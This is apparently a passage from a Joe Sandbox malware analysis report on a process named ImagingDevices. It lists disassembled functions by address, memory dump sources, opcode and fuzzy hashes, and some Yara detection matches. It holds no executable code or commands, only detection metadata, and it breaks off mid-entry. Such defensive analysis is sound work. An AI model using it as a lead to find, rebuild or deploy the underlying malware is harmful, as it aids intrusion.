                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b5720c17c3d15a47ebcaaacdd9222924a5e6f00fff1916049371153693e112cb
                                                                                                  • Instruction ID: d524d34975df84a2e8e781330b61b0af2002e2e423a9c8aa7496e5dc672f2610
                                                                                                  • Opcode Fuzzy Hash: b5720c17c3d15a47ebcaaacdd9222924a5e6f00fff1916049371153693e112cb
                                                                                                  • Instruction Fuzzy Hash: 13B1AD31A046198BEB31CF68CC44BBAB3F4FF46710F04459AE98AE7691D7349D84CB21
                                                                                                  Function 0088E2E9 Relevance: .3, Instructions: 280COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a2918cd18f6939c95ec7efd8e079541295709df57790b92ff6761a15ae7d2518
                                                                                                  • Instruction ID: 2729e17452897d08c5ec116b6b33ceffda77640946139adc88e399f967b33c69
                                                                                                  • Opcode Fuzzy Hash: a2918cd18f6939c95ec7efd8e079541295709df57790b92ff6761a15ae7d2518
                                                                                                  • Instruction Fuzzy Hash: D2C1BD30A10619CBCF24CF59C480AADB7B1FF89324F688269D865EB391D734ED82DB50
                                                                                                  Function 0088FBD7 Relevance: .3, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21c15e03242d2de4fe8b40442de1bdac3d95046e6529a866c46426bfdcee435d
                                                                                                  • Instruction ID: 105e67793730abe60c11955137f424e9fc55d5aef48abe29443148a635450d56
                                                                                                  • Opcode Fuzzy Hash: 21c15e03242d2de4fe8b40442de1bdac3d95046e6529a866c46426bfdcee435d
                                                                                                  • Instruction Fuzzy Hash: 15918E75D002AE8ADF34AF95C4402FEB7B1FF51704FA4402AD982E72C6E7749982CB65
                                                                                                  Function 008B7B00 Relevance: .3, Instructions: 252COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                                                                  • Instruction ID: 22e7f4ccdc27fe1c50003f0d0fa38d1c9667eb0694e57af3ceba876d6142ba27
                                                                                                  • Opcode Fuzzy Hash: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                                                                  • Instruction Fuzzy Hash: 3471293160939DCFDB258A3884C01BD7B56FBD2318B348276E482CB78AD970D947EB51
                                                                                                  Function 009363BF Relevance: .2, Instructions: 233COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                                                                  • Instruction ID: 70a77617014c7d7daa2dc1dc68e692a078c889bc2ecf6b0e130dc02c3a9c3d2b
                                                                                                  • Opcode Fuzzy Hash: d9ea8a5cce64cf5c216998eda348521a406c0f5b5e816de941c4428d2ab67aee
                                                                                                  • Instruction Fuzzy Hash: 15913D72910B06EBD725CF29C58A666BBE4FF05358F24CA68E4E6DB1A0C374E951DF00
                                                                                                  Function 0088E0C6 Relevance: .2, Instructions: 232COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: afa6979fd8b01f10829999ef77b2d66c4a8f92ab7df4349fbbe0a5a262f75807
                                                                                                  • Instruction ID: 849b83603b47e77436b1f5038c9e9bd8dbd3390b25a314cc8fa46170b7b12106
                                                                                                  • Opcode Fuzzy Hash: afa6979fd8b01f10829999ef77b2d66c4a8f92ab7df4349fbbe0a5a262f75807
                                                                                                  • Instruction Fuzzy Hash: 3A81CF71A00249AFDF26DF68C894BBEBBB5FF50314F198669E826DB242D334D901DB50
                                                                                                  Function 008C0D3B Relevance: .2, Instructions: 229COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                                                                  • Instruction ID: 5c3681690a9940a1eac77f33c6db856b529c5c9dccfbd669bbd0c2f874c321f0
                                                                                                  • Opcode Fuzzy Hash: d29057e861a732b4ac2a14fcb8bea8550a492b198ebcbd8764d1de0b5c1eb7d1
                                                                                                  • Instruction Fuzzy Hash: 5A916A70604219DFDB28CF54C490EBABBB5FF49304F2982AEE9868B356D730AC40CB50
                                                                                                  Function 008BD005 Relevance: .2, Instructions: 221COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db2119342092925a6dc74bb9450141eb0de7b27afd925301b4c2c1597eed996d
                                                                                                  • Instruction ID: bba1ee344f99dcb89ae65f1ac12334d67906136d5b69c4fc7b54d317e1023ca0
                                                                                                  • Opcode Fuzzy Hash: db2119342092925a6dc74bb9450141eb0de7b27afd925301b4c2c1597eed996d
                                                                                                  • Instruction Fuzzy Hash: E691F97291832ACBCB148F05C4901BA7BA2FFA4755B25816EFD818F391E774C991E7E0
                                                                                                  Function 0092F8EE Relevance: .2, Instructions: 188COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 21ffe123f40ef825153bc761b7cce134d9635d19df2a97450d202dc2dcbd4d4e
                                                                                                  • Instruction ID: 9a08ecc266f51fc11ce9d80620f29293d480261e2145257c679b7a979acf5162
                                                                                                  • Opcode Fuzzy Hash: 21ffe123f40ef825153bc761b7cce134d9635d19df2a97450d202dc2dcbd4d4e
                                                                                                  • Instruction Fuzzy Hash: 2B61B3315006319FDB248F11D478FBBBBB9EF66714F5581B8E4492B299D338A846CF90
                                                                                                  Function 008DA37B Relevance: .2, Instructions: 175COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 08993491d670df99ecaa9a9068b6dd4666293aed9bc8ce339d73791abddb703a
                                                                                                  • Instruction ID: df71b952612c3249adc26652761ab61f8f35a75cd64ec8087bdb8bda8f69b97d
                                                                                                  • Opcode Fuzzy Hash: 08993491d670df99ecaa9a9068b6dd4666293aed9bc8ce339d73791abddb703a
                                                                                                  • Instruction Fuzzy Hash: 4851CF73E115298BE3088E19CC00259B7A3EBC4314F3AC679DC28DB385DAB9D91286C0
                                                                                                  Function 008C5485 Relevance: .2, Instructions: 172COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9641c576afafddcf6246af5b5d904b40a6be14fea435a6ab0a829f07064fcca9
                                                                                                  • Instruction ID: 0bc58b04cd1a0c642ba1ff508fb2a3535a6a65e51fdcc29c1cad0d8825b4fc13
                                                                                                  • Opcode Fuzzy Hash: 9641c576afafddcf6246af5b5d904b40a6be14fea435a6ab0a829f07064fcca9
                                                                                                  • Instruction Fuzzy Hash: F95179B2F546289BCB18CB1D8C9052ABBF2FFC432171E8269D865D7311C670DC819784
                                                                                                  Function 00410063 Relevance: .2, Instructions: 165COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad2e227d4ee62184054d21c0dec7425c11b2353c22f09fd01f6817d15bf8066f
                                                                                                  • Instruction ID: b7e3d5f802db61a77af992bad9d381a3fda5d775de84f76c7566b26d47f92f78
                                                                                                  • Opcode Fuzzy Hash: ad2e227d4ee62184054d21c0dec7425c11b2353c22f09fd01f6817d15bf8066f
                                                                                                  • Instruction Fuzzy Hash: C85182B3E14A214BD3188E09CC40632B792EFD8312B5F81BADD199B357CA74E9529A90
                                                                                                  Function 0041005A Relevance: .2, Instructions: 163COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dcfffacc2d90934b02b8d513937dd1449233c5499f3b5c14b8a2e053c6a4daee
                                                                                                  • Instruction ID: 04009944686461c73d890484b5bc7b776b94432513094d237ae3e1dc960653aa
                                                                                                  • Opcode Fuzzy Hash: dcfffacc2d90934b02b8d513937dd1449233c5499f3b5c14b8a2e053c6a4daee
                                                                                                  • Instruction Fuzzy Hash: 275183B3E14A214BD3188E09CC50632B692EFD8312B5F81BEDD199B357CE74ED529A90
                                                                                                  Function 008C2E2F Relevance: .2, Instructions: 159COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ddeb7429a1735862b447e69653d730ee678486fb446c5dc32128f4d007ccf691
                                                                                                  • Instruction ID: f948740b25c4082c99e2738ce8d7aca2006bc3f6e9838846551b8ef2274b9dfd
                                                                                                  • Opcode Fuzzy Hash: ddeb7429a1735862b447e69653d730ee678486fb446c5dc32128f4d007ccf691
                                                                                                  • Instruction Fuzzy Hash: F051BE7510470ADBCB24AF28C880ABA77F4FF45709B2085AEF982DB291E770D951D761
                                                                                                  Function 00894680 Relevance: .1, Instructions: 140COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2f35b4124e1790e972c35e81b73c09fc9e68a35dd2fdfc29c9a2a4ba0f33d34a
                                                                                                  • Instruction ID: dfa302065db9846ab79b0d05fbe13aea1c2fc6b6a9715e12efa534989c0f2236
                                                                                                  • Opcode Fuzzy Hash: 2f35b4124e1790e972c35e81b73c09fc9e68a35dd2fdfc29c9a2a4ba0f33d34a
                                                                                                  • Instruction Fuzzy Hash: 874116702042AD9FEB28AE26C8A1F7337E9FB43355F18541EE9C3CB592D7609842D720
                                                                                                  Function 00915955 Relevance: .1, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f92b4901e14b3ab99fa25680417917dcbf94e29b4610ae4eb16e227f938385b2
                                                                                                  • Instruction ID: 5718794ac6d27e4a54a639dd1f601caeb08ee7f6b4633548ff558021807107a1
                                                                                                  • Opcode Fuzzy Hash: f92b4901e14b3ab99fa25680417917dcbf94e29b4610ae4eb16e227f938385b2
                                                                                                  • Instruction Fuzzy Hash: 76411334204B9ADAC720CF29C4806F6BBF5FF99314F168949E4D58B252D336E886DB60
                                                                                                  Function 0040E2FB Relevance: .1, Instructions: 115COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6a9533da65712b6a58bf2eb28af00ead2ad1f83e0dff47293d6f5df82446ee51
                                                                                                  • Instruction ID: aa3ccfad782c72e8213a0920b2a76557c5bfdf7b5c4b5ddedd22e23c7d81ddf8
                                                                                                  • Opcode Fuzzy Hash: 6a9533da65712b6a58bf2eb28af00ead2ad1f83e0dff47293d6f5df82446ee51
                                                                                                  • Instruction Fuzzy Hash: 2941A2116586F14ED31E436E08B9675AFC18E9720174EC2FEDADA6F2F3C0988419D3A5
                                                                                                  Function 0040E303 Relevance: .1, Instructions: 108COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                  • Instruction ID: be4e6c4af12396025ce2767f8201240d105e7470908340857892b732c948fd04
                                                                                                  • Opcode Fuzzy Hash: a4f1a47e469db01a1eef6c7f2d5b49e19d955ffd97c7228385fc8c35807cfa85
                                                                                                  • Instruction Fuzzy Hash: BD3182116586F10DD30E436E08BD675AEC18E5720174EC2FEDADA6F2F3C0988418D3A5
                                                                                                  Function 0042EB73 Relevance: .1, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
